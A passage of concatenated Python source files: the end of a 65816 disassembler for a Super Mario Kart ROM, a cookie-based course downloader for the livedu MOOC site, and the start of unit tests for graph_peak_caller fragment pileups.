return f"${v:0{6}X}"
def handle_AbsJmp(v, size=0):
return f"(${v:0{4}X})"
def handle_AbsLngJmp(v, size=0):
return f"${v:0{6}X}"
def handle_Acc(v, size=0):
pass
def handle_BlkMov(v, size=0):
p2 = v & 0x00FF
p1 = (v & 0xFF00) >> 8
return f"${p1:0{2}X},${p2:0{2}X}"
def handle_DirIdxIndX(v, size=0):
return f"(${v:0{2}X},x)"
def handle_DirIdxX(v, size=0):
return f"${v:0{2}X},x"
def handle_DirIdxY(v, size=0):
return f"${v:0{2}X},y"
def handle_DirIndIdxY(v, size=0):
return f"(${v:0{2}X}),y"
def handle_DirIndLngIdxY(v, size=0):
return f"[${v:0{2}X}],y"
def handle_DirIndLng(v, size=0):
return f"[${v:0{2}X}]"
def handle_DirInd(v, size=0):
return f"(${v:0{2}X})"
def handle_Dir(v, size=0):
return f"${v:0{2}X}"
def handle_Imp(v):
pass
def handle_RelLng(v, size=0):
return f"${v:0{4}X}"
def handle_Rel(v, size=0):
return f"${v:0{2}X}"
def handle_Stk(v, size=0):
pass
def handle_StkRel(v, size=0):
return f"${v:0{2}X},s"
def handle_StkRelIndIdxY(v, size=0):
return f"(${v:0{2}X},s),y"
address_mode_dispatch = {AddressMode.Sig8: handle_Sig8,
AddressMode.Imm8: handle_Imm8,
AddressMode.Imm16: handle_Imm16,
AddressMode.ImmX: handle_ImmX,
AddressMode.ImmM: handle_ImmM,
AddressMode.Abs: handle_Abs,
AddressMode.AbsIdxXInd: handle_AbsIdxXInd,
AddressMode.AbsIdxX: handle_AbsIdxX,
AddressMode.AbsIdxY: handle_AbsIdxY,
AddressMode.AbsInd: handle_AbsInd,
AddressMode.AbsIndLng: handle_AbsIndLng,
AddressMode.AbsLngIdxX: handle_AbsLngIdxX,
AddressMode.AbsLng: handle_AbsLng,
AddressMode.AbsJmp: handle_AbsJmp,
AddressMode.AbsLngJmp: handle_AbsLngJmp,
AddressMode.Acc: handle_Acc,
AddressMode.BlkMov: handle_BlkMov,
AddressMode.DirIdxIndX: handle_DirIdxIndX,
AddressMode.DirIdxX: handle_DirIdxX,
AddressMode.DirIdxY: handle_DirIdxY,
AddressMode.DirIndIdxY: handle_DirIndIdxY,
AddressMode.DirIndLngIdxY: handle_DirIndLngIdxY,
AddressMode.DirIndLng: handle_DirIndLng,
AddressMode.DirInd: handle_DirInd,
AddressMode.Dir: handle_Dir,
AddressMode.Imp: handle_Imp,
AddressMode.RelLng: handle_RelLng,
AddressMode.Rel: handle_Rel,
AddressMode.Stk: handle_Stk,
AddressMode.StkRel: handle_StkRel,
AddressMode.StkRelIndIdxY: handle_StkRelIndIdxY}
opcode_address_modes = [AddressMode.Sig8, AddressMode.DirIdxIndX, AddressMode.Sig8, AddressMode.StkRel, AddressMode.Dir,
AddressMode.Dir, AddressMode.Dir, AddressMode.DirIndLng, AddressMode.Stk, AddressMode.ImmM,
AddressMode.Acc,
AddressMode.Stk, AddressMode.Abs, AddressMode.Abs, AddressMode.Abs, AddressMode.AbsLng,
AddressMode.Rel, AddressMode.DirIndIdxY, AddressMode.DirInd, AddressMode.StkRelIndIdxY,
AddressMode.Dir, AddressMode.DirIdxX, AddressMode.DirIdxX, AddressMode.DirIndLngIdxY,
AddressMode.Imp, AddressMode.AbsIdxY, AddressMode.Acc, AddressMode.Imp, AddressMode.Abs,
AddressMode.AbsIdxX, AddressMode.AbsIdxX, AddressMode.AbsLngIdxX,
AddressMode.Abs, AddressMode.DirIdxIndX, AddressMode.AbsLng, AddressMode.StkRel,
AddressMode.Dir, AddressMode.Dir, AddressMode.Dir, AddressMode.DirIndLng, AddressMode.Stk,
AddressMode.ImmM, AddressMode.Acc,
AddressMode.Stk, AddressMode.Abs, AddressMode.Abs, AddressMode.Abs, AddressMode.AbsLng,
AddressMode.Rel, AddressMode.DirIndIdxY, AddressMode.DirInd, AddressMode.StkRelIndIdxY,
AddressMode.DirIdxX, AddressMode.DirIdxX, AddressMode.DirIdxX,
AddressMode.DirIndLngIdxY, AddressMode.Imp, AddressMode.AbsIdxY, AddressMode.Acc,
AddressMode.Imp, AddressMode.AbsIdxX, AddressMode.AbsIdxX, AddressMode.AbsIdxX,
AddressMode.AbsLngIdxX,
AddressMode.Stk, AddressMode.DirIdxIndX, AddressMode.Imm8, AddressMode.StkRel,
AddressMode.BlkMov, AddressMode.Dir, AddressMode.Dir, AddressMode.DirIndLng, AddressMode.Stk,
AddressMode.ImmM,
AddressMode.Acc, AddressMode.Stk, AddressMode.Abs, AddressMode.Abs, AddressMode.Abs,
AddressMode.AbsLng,
AddressMode.Rel, AddressMode.DirIndIdxY, AddressMode.DirInd, AddressMode.StkRelIndIdxY,
AddressMode.BlkMov, AddressMode.DirIdxX, AddressMode.DirIdxX, AddressMode.DirIndLngIdxY,
AddressMode.Imp, AddressMode.AbsIdxY, AddressMode.Stk, AddressMode.Imp, AddressMode.AbsLng,
AddressMode.AbsIdxX, AddressMode.AbsIdxX, AddressMode.AbsLngIdxX,
AddressMode.Stk, AddressMode.DirIdxIndX, AddressMode.RelLng, AddressMode.StkRel,
AddressMode.Dir, AddressMode.Dir, AddressMode.Dir, AddressMode.DirIndLng, AddressMode.Stk,
AddressMode.ImmM, AddressMode.Acc,
AddressMode.Stk, AddressMode.AbsInd, AddressMode.Abs, AddressMode.Abs, AddressMode.AbsLng,
AddressMode.Rel, AddressMode.DirIndIdxY, AddressMode.DirInd, AddressMode.StkRelIndIdxY,
AddressMode.DirIdxX, AddressMode.DirIdxX, AddressMode.DirIdxX,
AddressMode.DirIndLngIdxY, AddressMode.Imp, AddressMode.AbsIdxY, AddressMode.Stk,
AddressMode.Imp, AddressMode.AbsIdxXInd, AddressMode.AbsIdxX, AddressMode.AbsIdxX,
AddressMode.AbsLngIdxX,
AddressMode.Rel, AddressMode.DirIdxIndX, AddressMode.RelLng, AddressMode.StkRel,
AddressMode.Dir, AddressMode.Dir, AddressMode.Dir, AddressMode.DirIndLng, AddressMode.Imp,
AddressMode.ImmM, AddressMode.Imp,
AddressMode.Stk, AddressMode.Abs, AddressMode.Abs, AddressMode.Abs, AddressMode.AbsLng,
AddressMode.Rel, AddressMode.DirIndIdxY, AddressMode.DirInd, AddressMode.StkRelIndIdxY,
AddressMode.DirIdxX, AddressMode.DirIdxX, AddressMode.DirIdxY,
AddressMode.DirIndLngIdxY, AddressMode.Imp, AddressMode.AbsIdxY, AddressMode.Imp,
AddressMode.Imp, AddressMode.Abs, AddressMode.AbsIdxX, AddressMode.AbsIdxX,
AddressMode.AbsLngIdxX,
AddressMode.ImmX, AddressMode.DirIdxIndX, AddressMode.ImmX, AddressMode.StkRel, AddressMode.Dir,
AddressMode.Dir, AddressMode.Dir, AddressMode.DirIndLng, AddressMode.Imp, AddressMode.ImmM,
AddressMode.Imp,
AddressMode.Stk, AddressMode.Abs, AddressMode.Abs, AddressMode.Abs, AddressMode.AbsLng,
AddressMode.Rel, AddressMode.DirIndIdxY, AddressMode.DirInd, AddressMode.StkRelIndIdxY,
AddressMode.DirIdxX, AddressMode.DirIdxX, AddressMode.DirIdxY,
AddressMode.DirIndLngIdxY, AddressMode.Imp, AddressMode.AbsIdxY, AddressMode.Imp,
AddressMode.Imp, AddressMode.AbsIdxX, AddressMode.AbsIdxX, AddressMode.AbsIdxY,
AddressMode.AbsLngIdxX,
AddressMode.ImmX, AddressMode.DirIdxIndX, AddressMode.Imm8, AddressMode.StkRel, AddressMode.Dir,
AddressMode.Dir, AddressMode.Dir, AddressMode.DirIndLng, AddressMode.Imp, AddressMode.ImmM,
AddressMode.Imp,
AddressMode.Imp, AddressMode.Abs, AddressMode.Abs, AddressMode.Abs, AddressMode.AbsLng,
AddressMode.Rel, AddressMode.DirIndIdxY, AddressMode.DirInd, AddressMode.StkRelIndIdxY,
AddressMode.Dir, AddressMode.DirIdxX, AddressMode.DirIdxX, AddressMode.DirIndLngIdxY,
AddressMode.Imp, AddressMode.AbsIdxY, AddressMode.Stk, AddressMode.Imp, AddressMode.AbsIndLng,
AddressMode.AbsIdxX, AddressMode.AbsIdxX, AddressMode.AbsLngIdxX,
AddressMode.ImmX, AddressMode.DirIdxIndX, AddressMode.Imm8, AddressMode.StkRel, AddressMode.Dir,
AddressMode.Dir, AddressMode.Dir, AddressMode.DirIndLng, AddressMode.Imp, AddressMode.ImmM,
AddressMode.Imp,
AddressMode.Imp, AddressMode.Abs, AddressMode.Abs, AddressMode.Abs, AddressMode.AbsLng,
AddressMode.Rel, AddressMode.DirIndIdxY, AddressMode.DirInd, AddressMode.StkRelIndIdxY,
AddressMode.Imm16, AddressMode.DirIdxX, AddressMode.DirIdxX, AddressMode.DirIndLngIdxY,
AddressMode.Imp, AddressMode.AbsIdxY, AddressMode.Stk, AddressMode.Imp, AddressMode.AbsIdxXInd,
AddressMode.AbsIdxX, AddressMode.AbsIdxX, AddressMode.AbsLngIdxX]
opcodes = ["BRK", "ORA", "COP", "ORA", "TSB", "ORA", "ASL", "ORA", "PHP", "ORA", "ASL", "PHD", "TSB", "ORA", "ASL",
"ORA",
"BPL", "ORA", "ORA", "ORA", "TRB", "ORA", "ASL", "ORA", "CLC", "ORA", "INC", "TCS", "TRB", "ORA", "ASL",
"ORA",
"JSR", "AND", "JSL", "AND", "BIT", "AND", "ROL", "AND", "PLP", "AND", "ROL", "PLD", "BIT", "AND", "ROL",
"AND",
"BMI", "AND", "AND", "AND", "BIT", "AND", "ROL", "AND", "SEC", "AND", "DEC", "TSC", "BIT", "AND", "ROL",
"AND",
"RTI", "EOR", "WDM", "EOR", "MVP", "EOR", "LSR", "EOR", "PHA", "EOR", "LSR", "PHK", "JMP", "EOR", "LSR",
"EOR",
"BVC", "EOR", "EOR", "EOR", "MVN", "EOR", "LSR", "EOR", "CLI", "EOR", "PHY", "TCD", "JMP", "EOR", "LSR",
"EOR",
"RTS", "ADC", "PER", "ADC", "STZ", "ADC", "ROR", "ADC", "PLA", "ADC", "ROR", "RTL", "JMP", "ADC", "ROR",
"ADC",
"BVS", "ADC", "ADC", "ADC", "STZ", "ADC", "ROR", "ADC", "SEI", "ADC", "PLY", "TDC", "JMP", "ADC", "ROR",
"ADC",
"BRA", "STA", "BRL", "STA", "STY", "STA", "STX", "STA", "DEY", "BIT", "TXA", "PHB", "STY", "STA", "STX",
"STA",
"BCC", "STA", "STA", "STA", "STY", "STA", "STX", "STA", "TYA", "STA", "TXS", "TXY", "STZ", "STA", "STZ",
"STA",
"LDY", "LDA", "LDX", "LDA", "LDY", "LDA", "LDX", "LDA", "TAY", "LDA", "TAX", "PLB", "LDY", "LDA", "LDX",
"LDA",
"BCS", "LDA", "LDA", "LDA", "LDY", "LDA", "LDX", "LDA", "CLV", "LDA", "TSX", "TYX", "LDY", "LDA", "LDX",
"LDA",
"CPY", "CMP", "REP", "CMP", "CPY", "CMP", "DEC", "CMP", "INY", "CMP", "DEX", "WAI", "CPY", "CMP", "DEC",
"CMP",
"BNE", "CMP", "CMP", "CMP", "PEI", "CMP", "DEC", "CMP", "CLD", "CMP", "PHX", "STP", "JML", "CMP", "DEC",
"CMP",
"CPX", "SBC", "SEP", "SBC", "CPX", "SBC", "INC", "SBC", "INX", "SBC", "NOP", "XBA", "CPX", "SBC", "INC",
"SBC",
"BEQ", "SBC", "SBC", "SBC", "PEA", "SBC", "INC", "SBC", "SED", "SBC", "PLX", "XCE", "JSR", "SBC", "INC",
"SBC"]
def get_addr_mode_from_opcode_value(opcode_value):
return opcode_address_modes[opcode_value]
class Data:
def __init__(self, value=0xff):
self.value = value
def render(self, output, bank_num, bank_offset):
comment_addr = bank_num | bank_offset
comment_string = f"; ${comment_addr:0{6}X}\n"
assembly_string = f"\tdb ${self.value:0{2}X}"
width = ASSEMBLY_OUTPUT_LINE_WIDTH - len(assembly_string)
output.write(f"{assembly_string}{comment_string:>{width}}")
def build_ast(self, ast, offset):
pass
class Instruction:
def __init__(self, opcode, current_memory_mode, current_index_mode, rom_data_from_operand_addr, bank_index, bank_offset, labels_set, func_names, pc):
addr_mode = get_addr_mode_from_opcode_value(opcode)
self.opcode = opcode
self.operand_size = get_operand_size(addr_mode, current_memory_mode, current_index_mode)
self.addr_mode = addr_mode
self.operand = get_operand(rom_data_from_operand_addr, self.operand_size)
self.memory_mode = current_memory_mode
self.index_mode = current_index_mode
self.instruction_string = ""
self.func_names = func_names
self.pc = pc
self.jump_label_name = None
if opcode in [0x4C, 0x20]:
self.jump_label_name = f"CODE_{(BANK_START + bank_index) << 16 | self.operand:0{6}X}"
offset_of_jump_target = (bank_index * BANK_SIZE) + self.operand
labels_set.add(offset_of_jump_target)
elif opcode in [0x22, 0x5C]:
addr, jump_bank, jump_offset = convert_runtime_address_to_rom(self.operand)
self.jump_label_name = f"CODE_{(BANK_START + jump_bank) << 16 | jump_offset:0{6}X}"
offset_of_jump_target = (jump_bank * BANK_SIZE) + jump_offset
labels_set.add(offset_of_jump_target)
elif opcode in [0x90, 0xB0, 0xF0, 0x30, 0xD0, 0x10, 0x80, 0x50, 0x70]:
jump_amount_signed = self.operand - 256 if self.operand > 127 else self.operand
jump_offset = (bank_offset + 2 + jump_amount_signed) & 0xFFFF
self.jump_label_name = f"CODE_{(BANK_START + bank_index) << 16 | jump_offset:0{6}X}"
offset_of_jump_target = (bank_index * BANK_SIZE) + jump_offset
labels_set.add(offset_of_jump_target)
elif opcode in [0x80]:
jump_amount_signed = self.operand - 65536 if self.operand > 32767 else self.operand
jump_offset = (bank_offset + 3 + jump_amount_signed) & 0xFFFF
self.jump_label_name = f"CODE_{(BANK_START + bank_index) << 16 | jump_offset:0{6}X}"
offset_of_jump_target = (bank_index * BANK_SIZE) + jump_offset
labels_set.add(offset_of_jump_target)
if opcode is 0x80:
offset_of_next_instruction = (bank_index * BANK_SIZE) + ((bank_offset + 2) & 0xFFFF)
labels_set.add(offset_of_next_instruction)
elif opcode in [0x4C, 0x6C, 0x7C, 0xDC]:
offset_of_next_instruction = (bank_index * BANK_SIZE) + ((bank_offset + 3) & 0xFFFF)
labels_set.add(offset_of_next_instruction)
def render(self, output, bank_num, bank_offset):
comment_addr = bank_num | bank_offset
comment_string = f"; ${comment_addr:0{6}X}\n"
opcode_string = f"\t{opcodes[self.opcode]}"
if self.operand is None:
width = ASSEMBLY_OUTPUT_LINE_WIDTH - len(opcode_string)
output.write(f"{opcode_string}{comment_string:>{width}}")
self.instruction_string = f"{opcodes[self.opcode]}"
else:
operand_string = address_mode_dispatch[self.addr_mode](self.operand, self.operand_size)
if operand_string in hardware_registers:
operand_string = hardware_registers[operand_string]
width = ASSEMBLY_OUTPUT_LINE_WIDTH - (len(opcode_string) + len(operand_string) + 1)
output.write(f"{opcode_string} {operand_string}{comment_string:>{width}}")
self.instruction_string = f"{opcodes[self.opcode]} {operand_string}"
def build_ast(self, ast, offset):
if self.operand is not None:
if self.jump_label_name is not None:
ast.append({"Instruction": {"offset": offset, "pc": self.pc, "instruction_string": self.instruction_string, "opcode": self.opcode, "operand": self.operand, "jump_label_name": self.jump_label_name, "operand_size": self.operand_size, "memory_mode": 1 if self.memory_mode is MemoryMode.EIGHT_BIT else 0, "index_mode": 1 if self.index_mode is MemoryMode.EIGHT_BIT else 0, "func_names" : self.func_names}})
else:
ast.append({"Instruction": {"offset": offset, "pc": self.pc, "instruction_string": self.instruction_string, "opcode": self.opcode, "operand": self.operand, "operand_size": self.operand_size, "memory_mode": 1 if self.memory_mode is MemoryMode.EIGHT_BIT else 0, "index_mode": 1 if self.index_mode is MemoryMode.EIGHT_BIT else 0, "func_names" : self.func_names}})
else:
ast.append({"Instruction": {"offset": offset, "pc": self.pc, "instruction_string": self.instruction_string, "opcode": self.opcode, "memory_mode": 1 if self.memory_mode is MemoryMode.EIGHT_BIT else 0, "index_mode": 1 if self.index_mode is MemoryMode.EIGHT_BIT else 0,"func_names" : self.func_names}})
class InstructionOperand:
def __init__(self, value):
self.value = value
def render(self, output, bank_num, bank_offset):
pass
def build_ast(self, ast, offset):
pass
class Bank:
def __init__(self, bank_index):
self.payload = [None for _ in range(BANK_SIZE)]
self.bank_index = bank_index
self.bank_num = (BANK_START + bank_index) << 16
def render(self, output, labels_set):
for (bank_offset, payload) in enumerate(self.payload):
if bank_offset == 0x0000:
code_addr = (0x40 + self.bank_index) << 16
output.write(f"\norg ${code_addr:0{6}X}\n")
elif bank_offset == 0x8000:
code_addr = ((BANK_START + self.bank_index) << 16) + bank_offset
output.write(f"\norg ${code_addr:0{6}X}\n")
if payload is not None:
offset = (self.bank_index * BANK_SIZE) + bank_offset
if offset in labels_set:
output.write("\n")
output.write(f"CODE_{self.bank_num | bank_offset:0{6}X}:\n")
payload.render(output, self.bank_num, bank_offset)
def build_ast(self, ast, labels_set):
for (bank_offset, payload) in enumerate(self.payload):
if payload is not None:
offset = (self.bank_index * BANK_SIZE) + bank_offset
if offset in labels_set:
ast.append({"Label": {"offset": offset, "name": f"CODE_{self.bank_num | bank_offset:0{6}X}"}})
payload.build_ast(ast, offset)
class Disassembly:
def __init__(self, labels_set, rom):
self.banks = [Bank(i) for i in range(NUM_BANKS)]
self.labels_set = labels_set
addr_reset, bank_reset, bank_offset_reset = convert_runtime_address_to_rom(get_operand(rom[ROM_RESET_ADDR:], 2))
self.labels_set.add((bank_reset * BANK_SIZE) + bank_offset_reset)
self.rom_reset_func_name = f"FUNC_{((BANK_START + bank_reset) << 16) | bank_offset_reset:0{6}X}"
self.rom_reset_addr = addr_reset
addr_nmi, bank_nmi, bank_offset_nmi = convert_runtime_address_to_rom(get_operand(rom[ROM_NMI_ADDR:], 2))
self.labels_set.add((bank_nmi * BANK_SIZE) + bank_offset_nmi)
self.rom_nmi_func_name = f"FUNC_{((BANK_START + bank_nmi) << 16) | bank_offset_nmi:0{6}X}"
addr_irq, bank_irq, bank_offset_irq = convert_runtime_address_to_rom(get_operand(rom[ROM_IRQ_ADDR:], 2))
self.labels_set.add((bank_irq * BANK_SIZE) + bank_offset_irq)
self.rom_irq_func_name = f"FUNC_{((BANK_START + bank_irq) << 16) | bank_offset_irq:0{6}X}"
def mark_as_data(self, bank, bank_offset, data):
self.banks[bank].payload[bank_offset] = Data(data)
def mark_as_instruction(self, bank, bank_offset, opcode, current_memory_mode, current_index_mode,
rom_data_from_operand_addr, func_names, pc):
# detect the case where the original assembly employed space saving technique utilising part of the previous
# instruction operand as the opcode.
# if the address we were going to write the instruction to is part of a previous InstructionOperand
# then we bail out as we want to leave this bit as data to be able to reassemble
if isinstance(self.banks[bank].payload[bank_offset], InstructionOperand):
return False
addr_mode = get_addr_mode_from_opcode_value(opcode)
operand_size = get_operand_size(addr_mode, current_memory_mode, current_index_mode)
for i in range(operand_size+1):
if isinstance(self.banks[bank].payload[bank_offset + i], Instruction):
return False
self.banks[bank].payload[bank_offset] = Instruction(opcode=opcode,
current_memory_mode=current_memory_mode,
current_index_mode=current_index_mode,
rom_data_from_operand_addr=rom_data_from_operand_addr,
bank_index=bank,
bank_offset=bank_offset,
labels_set=self.labels_set,
func_names=func_names,
pc=pc)
for i in range(1, operand_size+1):
self.banks[bank].payload[bank_offset + i] = InstructionOperand(rom_data_from_operand_addr[i])
return True
def render(self):
for (bank_index, bank) in enumerate(self.banks):
bank_output = io.StringIO()
if bank_index == 0:
bank_output.write(f"hirom\n\narch 65816\n\n")
bank.render(bank_output, self.labels_set)
with open(f"bank{bank_index:0{2}d}.asm", 'w') as f:
f.write(bank_output.getvalue())
def build_ast(self, ast):
for bank in self.banks:
bank.build_ast(ast, self.labels_set)
def write_ast(self, output_filename, offset_to_function_name, jump_tables, function_names, labels_to_functions, return_address_manipulation_functions):
with open(output_filename, 'w') as f:
ast = []
self.build_ast(ast)
ast_dict = {"ast": ast}
ast_dict["rom_reset_func_name"] = self.rom_reset_func_name
ast_dict["rom_reset_addr"] = self.rom_reset_addr
ast_dict["rom_nmi_func_name"] = self.rom_nmi_func_name
ast_dict["rom_irq_func_name"] = self.rom_irq_func_name
ast_dict["offset_to_function_name"] = list(offset_to_function_name.items())
jump_tables_as_list = {}
for k, v in jump_tables.items():
jump_tables_as_list[k] = list(v.items())
ast_dict["jump_tables"] = list(jump_tables_as_list.items())
ast_dict["function_names"] = list(function_names)
ast_dict["labels_to_functions"] = list(labels_to_functions.items())
ast_dict["return_address_manipulation_functions"] = return_address_manipulation_functions
json.dump(ast_dict, f)
if __name__ == "__main__":
labels_set, labels_to_functions = open_label_addresses("labels.txt")
rom = open_rom("Super Mario Kart (USA).sfc")
disassembly = Disassembly(labels_set, rom)
for (addr, d) in enumerate(rom):
bank, bank_offset = get_bank_and_offset(addr)
disassembly.mark_as_data(bank=bank, bank_offset=bank_offset, data=d)
offset_to_function_name = open_pc_to_fixed_func_name("pcToFixedFuncName.txt")
jump_tables = open_jump_tables("jumpTablePCToFuncName.txt")
function_names = set()
for k, v in offset_to_function_name.items():
function_names.add(v)
for k, v in jump_tables.items():
for case, function_name in v.items():
if "CODE_" not in function_name:
function_names.add(function_name)
return_address_manipulation_functions = open_return_address_manipulation_functions("returnAddressManipulationFunctions.txt")
current_memory_mode = MemoryMode.EIGHT_BIT
current_index_mode = MemoryMode.EIGHT_BIT
executed_instruction_info = open_executed_instruction_addresses("instruction_trace.txt")
for instruction_info in executed_instruction_info:
for func_name in instruction_info.func_names:
function_names.add(func_name)
current_memory_mode = MemoryMode.EIGHT_BIT if instruction_info.memory_mode is 1 else MemoryMode.SIXTEEN_BIT
current_index_mode = MemoryMode.EIGHT_BIT if instruction_info.index_mode is 1 else MemoryMode.SIXTEEN_BIT
rom_addr, bank, bank_offset = convert_runtime_address_to_rom(instruction_info.runtime_addr)
if rom_addr in labels_to_functions:
for func_name in instruction_info.func_names:
if func_name not in labels_to_functions[rom_addr]:
labels_to_functions[rom_addr][func_name] = False
opcode_value = rom[rom_addr]
disassembly.mark_as_instruction(bank=bank, bank_offset=bank_offset, opcode=opcode_value,
current_memory_mode=current_memory_mode, current_index_mode=current_index_mode,
rom_data_from_operand_addr=rom[rom_addr+1:], func_names=instruction_info.func_names, pc=instruction_info.runtime_addr)
disassembly.render()
disassembly.write_ast("super_mario_kart_ast.json", offset_to_function_name, jump_tables, function_names, labels_to_functions, return_address_manipulation_functions)
|
<filename>moocs/livedu.py<gh_stars>10-100
# -*- coding: utf-8 -*-
"""北京高校优质课程研究会"""
import time
from bs4 import BeautifulSoup
from moocs.utils import *
from utils.crawler import Crawler
name = "livedu"
need_cookies = True
CANDY = Crawler()
CONFIG = {}
FILES = {}
VIDEOS = []
exports = {}
__all__ = ["name", "need_cookies", "start", "exports"]
def get_summary(url):
"""从课程主页面获取信息"""
course_id = re.search(r'kcid=(?P<course_id>\d+)', url).group('course_id')
data = {
'kcid': course_id,
'kcdm': course_id,
}
res = CANDY.post(CONFIG['study_page'], data=data)
study_soup = BeautifulSoup(res.text, 'html.parser')
name = study_soup.find(
'dl', class_='content-a-title').find('dt').find('span').string
home_text = CANDY.get(url).text
home_soup = BeautifulSoup(home_text, 'html.parser')
chapter_names = []
if home_soup.find('div', class_='vice-main-kcap'):
for chapter_lable in home_soup.find('div', class_='vice-main-kcap')\
.find('ul')\
.children:
try:
chapter_names.insert(
0, chapter_lable.find('div').find('span').string)
except:
pass
else:
for chapter_lable in home_soup.find('div', id='accordion')\
.find_all('h3'):
chapter_names.insert(0, chapter_lable.text)
dir_name = course_dir(name, '北京高校优质课程研究会')
print(dir_name)
CONFIG['course_id'] = course_id
CONFIG['study_soup'] = study_soup
CONFIG['chapter_names'] = chapter_names
return course_id, dir_name
def parse_resource(resource):
"""解析资源地址和下载资源"""
file_name = resource.file_name
if resource.type == 'Video':
ext = '.mp4'
if WORK_DIR.need_download(file_name+ext, CONFIG["overwrite"]):
resource.ext = ext
FILES['renamer'].write(
re.search(r'(\w+\.mp4)', resource.meta).group(1), file_name, ext)
FILES['video'].write_string(resource.meta)
VIDEOS.append((resource.meta, file_name+ext))
elif resource.type == 'Document':
if not WORK_DIR.need_download(file_name+".pdf", CONFIG["overwrite"]):
return
CANDY.download_bin(resource.meta, WORK_DIR.file(file_name + '.pdf'))
elif resource.type == 'Rich':
if not WORK_DIR.need_download(file_name+".html", CONFIG["overwrite"]):
return
with open(WORK_DIR.file(file_name + '.html'), 'w', encoding='utf_8') as file:
file.write(resource.meta)
def get_resource(course_id):
"""获取各种资源"""
outline = Outline()
counter = Counter()
video_list = []
pdf_list = []
test_list = []
study_soup = CONFIG['study_soup']
chapter_names = CONFIG['chapter_names']
study_div = study_soup.find('div', class_='ation-a-main')
left_div = study_div.find('div', class_='xx-main-left')
info_div = left_div.find('div', class_='xx-left-main')
chapters = info_div.find_all('dl')
for chapter in chapters:
counter.add(0)
# chapter_name = chapter.find('dt').contents[2].strip()
chapter_name = chapter_names.pop()
outline.write(chapter_name, counter, 0)
lessons = chapter.find_all('dd')
for lesson in lessons:
counter.add(1)
lesson_info = lesson.find('a')
lesson_id = re.search(r"xsxx\('(?P<lesson_id>.+)'\)",
lesson_info.attrs.get('onclick')).group('lesson_id')
data = {
'kcdm': course_id,
'zjdm': lesson_id,
}
res = CANDY.post(CONFIG['study_page'], data=data)
soup = BeautifulSoup(res.text, 'html.parser')
study_div = soup.find('div', class_='ation-a-main')
right_div = study_div.find('div', class_='xx-main-right')
study_box = right_div.find('div', class_='xx-main-box')
lesson_name = study_box.find('h4').contents[1]
outline.write(lesson_name, counter, 1)
resource_div = study_box.find('div', class_='study-L-text')
# GET video url
video_div = resource_div.find('div', id='videoBj_1')
if video_div:
video_url = video_div.find('input', id='sp').attrs.get('value')
video_name = 'Video:{}'.format(lesson_name)
outline.write(video_name, counter, 2, sign='#')
video_list.append(Video(counter, video_name, video_url))
# GET pdf url
pdf_iframe = resource_div.find(
'iframe', attrs={'name': 'pdfContainer'})
if pdf_iframe:
pdf_div = pdf_iframe.parent
pdf_name = pdf_div.find('span').string.replace('.pdf', '')
pdf_url = re.search(
r'cclj=(?P<pdf_url>http.+\.pdf)', pdf_iframe.attrs.get('src')).group('pdf_url')
outline.write(pdf_name, counter, 2, sign='*')
if CONFIG['doc']:
pdf_list.append(Document(counter, pdf_name, pdf_url))
# GET test text
test_div = study_box.find('div', class_='zy-a-list')
if test_div:
test_name = 'Test:{}'.format(lesson_name)
outline.write(test_name, counter, 2, sign='+')
if CONFIG['text']:
test_list.append(
RichText(counter, test_name, str(test_div)))
if video_list:
rename = WORK_DIR.file('Names.txt') if CONFIG['rename'] else False
WORK_DIR.change('Videos')
playlist = get_playlist(CONFIG["playlist_type"], CONFIG["playlist_path_type"])
if playlist:
parse_res_list(video_list, rename, playlist.write, parse_resource)
else:
parse_res_list(video_list, rename, parse_resource)
if pdf_list:
WORK_DIR.change('PDFs')
parse_res_list(pdf_list, None, parse_resource)
if test_list:
WORK_DIR.change('Texts')
parse_res_list(test_list, None, parse_resource)
def start(url, config, cookies=None):
"""调用接口函数"""
# 初始化设置
global WORK_DIR
CANDY.set_cookies(cookies)
CONFIG.update(config)
CONFIG['study_page'] = 'http://www.livedu.com.cn/ispace4.0/moocxsxx/queryAllZjByKcdm.do'
# 课程信息
course_info = get_summary(url)
# 创建课程目录
WORK_DIR = WorkingDir(CONFIG['dir'], course_info[1])
WORK_DIR.change('Videos')
FILES['renamer'] = Renamer(WORK_DIR.file('Rename.{ext}'))
FILES['video'] = ClassicFile(WORK_DIR.file('Videos.txt'))
# 获得资源
get_resource(course_info[0])
exports.update({
"workdir": WORK_DIR,
"spider": CANDY,
"videos": VIDEOS
})
|
import unittest
from offsetbasedgraph import GraphWithReversals as Graph, Block, \
DirectedInterval as Interval
from graph_peak_caller import Configuration
from graph_peak_caller.sample import get_fragment_pileup
from graph_peak_caller.intervals import Intervals
from util import from_intervals
class Tester(unittest.TestCase):
def _create_reads(self):
self.sample_reads = []
for fragment in self.fragments:
fragment.graph = self.graph
left_sub = fragment.get_subinterval(0, self.read_length())
self.sample_reads.append(left_sub)
right_sub = fragment.get_subinterval(
self.fragment_length() - self.read_length(),
self.fragment_length())
right_sub_reverse = right_sub.get_reverse()
self.sample_reads.append(right_sub_reverse)
def assert_final_pileup_equals_correct_pileup(self):
found_pileup = self.fragment_pileup.get_sparse_values()
correct_pileup = self.correct_pileup.get_sparse_values()
print("Found pileup")
print(found_pileup)
print("Correct pileup")
print(correct_pileup)
self.assertTrue(found_pileup == correct_pileup)
def setUp(self):
self.set_graph()
def run_callpeaks(self):
self._create_reads()
for read in self.sample_reads:
print(read)
self.graph_size = sum(block.length() for block in
self.graph.blocks.values())
config = Configuration()
config.fragment_length = self.fragment_length()
config.read_length = self.read_length()
self.fragment_pileup = get_fragment_pileup(
self.graph, Intervals(self.sample_reads),
config)
def do_asserts(self):
self.run_callpeaks()
self.assert_final_pileup_equals_correct_pileup()
class TestCase(Tester):
def set_graph(self):
raise NotImplementedError()
def get_correct_extended_pileup(self):
raise NotImplementedError()
def fragment_length(self):
raise NotImplementedError()
def read_length(self):
raise NotImplementedError()
class TestLinearGraph(TestCase):
def read_length(self):
return 2
def fragment_length(self):
return 5
def set_graph(self):
self.graph = Graph({1: Block(5), 2: Block(5)}, {1: [2]})
def test_single_fragment(self):
self.correct_pileup = from_intervals(self.graph,
[
Interval(3, 3, [1, 2]),
Interval(3, 3, [1, 2])
]
)
self.fragments = [Interval(3, 3, [1, 2])]
self.do_asserts()
def test_two_fragments(self):
self.correct_pileup = from_intervals(self.graph,
[
Interval(3, 3, [1, 2]),
Interval(3, 3, [1, 2]),
Interval(0, 5, [1]),
Interval(0, 5, [1]),
]
)
self.fragments = [
Interval(0, 5, [1]),
Interval(3, 3, [1, 2])
]
self.do_asserts()
class TestLinearGraphFullNodeCovered(TestCase):
def read_length(self):
return 5
def fragment_length(self):
return 15
def set_graph(self):
